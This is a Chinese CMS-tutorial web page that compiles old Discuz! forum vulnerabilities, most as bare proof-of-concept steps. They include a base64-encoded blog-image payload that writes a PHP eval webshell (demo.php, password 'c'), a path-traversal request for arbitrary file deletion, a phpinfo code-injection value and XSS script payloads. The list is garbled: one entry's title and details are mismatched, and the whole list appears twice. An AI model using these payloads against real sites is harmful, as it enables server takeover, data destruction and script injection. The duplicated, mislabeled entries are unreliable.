您现在的位置是:首页 > cms教程 > Discuz教程Discuz教程
Discuz常见漏洞汇总
元柏2025-07-03Discuz教程已有人查阅
导读Discuz ML! V3.X 代码注入代码注入导致RCEDiscuz! X2.5 远程代码执行(1).注册任意账户(2).登陆用户,发表blog日志(注意是日志)(3).添加图片,选择网络图片
Discuz ML! V3.X 代码注入
Date
2019
类型
代码注入导致RCE
影响范围
敏感信息泄露
影响范围:
DZ x2.5
POC:
http:// .xx.xx/uc_server/control/admin/db.php
http:// .xx.xx/source/plugin/myrepeats/table/table_myrepeats.php
http:// .xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date:
2012
类型:
RCE
前置条件:
(1).注册任意账户
(2).登陆用户,发表blog日志(注意是日志)
(3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(4).访问日志,论坛根目录下生成demo.php,一句发密码c
影响范围:
v2.5
Discuz!X2/2.5弱口令破解漏洞
Date:
2013
类型:
登录界面 破解
影响范围:
Discuz!X2/2.5
ssvid-93588
Date:
2014
类型:
任意文件删除
前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10
类型:
前台任意文件删除
影响范围:
SSV-89024
Date:
2015.1
类型:
Discuz X2.5 /source/class/class_image.php 命令执行漏洞
影响范围:
Discuz X2.5
Discuz! X系列远程代码执行漏洞
Date:
2015.8
类型:
RCE + XML反序列化
前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3
类型:
SSRF
影响范围:
Discuz! X2 X3
POC:
http://www.ebingou.cn/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8
类型:
远程代码执行
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析
Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
Date
2019
类型
代码注入导致RCE
影响范围
Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org
poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012
类型:敏感信息泄露
影响范围:
DZ x2.5
POC:
http:// .xx.xx/uc_server/control/admin/db.php
http:// .xx.xx/source/plugin/myrepeats/table/table_myrepeats.php
http:// .xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date:
2012
类型:
RCE
前置条件:
(1).注册任意账户
(2).登陆用户,发表blog日志(注意是日志)
(3).添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(4).访问日志,论坛根目录下生成demo.php,一句发密码c
影响范围:
v2.5
Discuz!X2/2.5弱口令破解漏洞
Date:
2013
类型:
登录界面 破解
影响范围:
Discuz!X2/2.5
ssvid-93588
Date:
2014
类型:
任意文件删除
前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10
类型:
前台任意文件删除
影响范围:
SSV-89024
Date:
2015.1
类型:
Discuz X2.5 /source/class/class_image.php 命令执行漏洞
影响范围:
Discuz X2.5
Discuz! X系列远程代码执行漏洞
Date:
2015.8
类型:
RCE + XML反序列化
前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3
类型:
SSRF
影响范围:
Discuz! X2 X3
POC:
http://www.ebingou.cn/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8
类型:
远程代码执行
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析
Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script>
Discuz! X1某页面存在XSS漏洞简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
本文标签:
很赞哦! ()
相关教程
图文教程
Discuz图片查看插件支持鼠标缩放、实际大小、旋转、下载
图片查看是网站中的常用功能,用于展示详细的图片。在discuz图片插件的基础上进行了改造,因此这篇文章主要从以下几个方面来讨论图片查看插件。希望可以帮助到大家
discuz删除forum.php的方法
discuz删除forum.php的方法:首先依次进入“网站后台-全局-域名设置-应用域名”;然后将论坛设置为你的域名,如“ .****.net”;最后点击提交即可。
Discuz<7.2 SQL注入漏洞分析
"魔术引号带来的新的安全问题"一节里,有提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体现,如下面的代码片段:
Discuz开发function_core常用函数分析
* [Discuz!] (C)2001-2099 Comsenz Inc.* This is NOT a freeware, use is subject to license terms
相关源码
-
(响应式)wordpress模板VieuV4.5主题资讯自媒体博客源码Vieu主题专注于个人博客与企业展示场景,采用响应式设计确保在手机、电脑、平板等多设备上的展示。主题集成会员中心、投稿系统、内容保护等实用功能,满足现代博客网站的建设需求。查看源码 -
(PC+WAP)绿色日志美文文学说说博客网站pbootcms模板除日志博客类网站外,通过替换图文内容可快速适配:心情日记分享平台、文学创作社区、朋友圈内容聚合站、美文鉴赏网站、读书笔记平台等应用场景。查看源码 -
(自适应)物流运输快递仓储货运网站模板免费下载基于PbootCMS内核开发的物流运输行业专用模板,深度适配仓储货运企业的业务展示需求。前端采用响应式布局,自动适配手机端访问,后台数据实时同步更新,帮助企业高效展示运输网络、仓储设施、服务流程等核心业务模块。查看源码 -
(PC+WAP)院校学院职业学校机构协会网站开源源码下载本模板基于PbootCMS系统开发,为高等院校、职业学校等教育机构设计,特别适合展示学校概况、院系设置、招生信息等内容。采用双端适配技术,确保在PC和移动设备上都能获得良好的浏览体验。查看源码 -
(自适应)品牌策划高端设计公司网站pbootcms模板免费下载本模板为品牌策划与设计公司打造,基于PbootCMS内核开发,充分考虑了创意设计行业的视觉展示需求。模板设计风格现代简约,布局合理清晰,呈现设计作品与专业服务,帮助设计公司展示创意实力并吸引潜在客户。查看源码 -
(带手机版)绿色生态农业种植农产品网站pbootcms源码下载本模板基于PbootCMS内核开发,为生态农业企业量身打造,适用于农业种植、有机农场、农产品电商等业务场景。模板设计充分体现绿色环保理念,突出农业特色,同时保持简洁大气的视觉效果,帮助农业企业建立专业形象。查看源码
| 分享笔记 (共有 篇笔记) |
